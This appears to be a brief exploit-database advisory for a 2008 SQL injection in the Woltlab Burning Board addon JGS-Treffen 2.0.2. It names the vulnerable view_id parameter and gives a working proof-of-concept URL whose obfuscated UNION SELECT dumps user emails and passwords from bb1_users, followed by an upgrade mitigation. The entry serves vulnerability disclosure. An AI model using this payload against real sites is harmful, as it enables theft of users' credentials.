vendor: Burning Board Addon JGS-Treffen
by: h0yt3r
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Burning Board Addon JGS-Treffen
Affected Version From: 2.0.2
Affected Version To: 2.0.2
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Woltlab Burning Board Addon JGS-Treffen SQL Injection
jgs_treffen.php 2.0.2 and lower contains a bug which allows an attacker to inject malicious SQL code into the vulnerable application. The injection point is the view_id parameter of the action=ansicht request. The PoC for this exploit is:
jgs_treffen.php?action=ansicht&view_id='-1/**/UnIoN/**/All/**/SeLeCt/**/1,2,CoNcAt(email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/bb1_users/*
Mitigation:
Upgrade to the latest version of jgs_treffen.php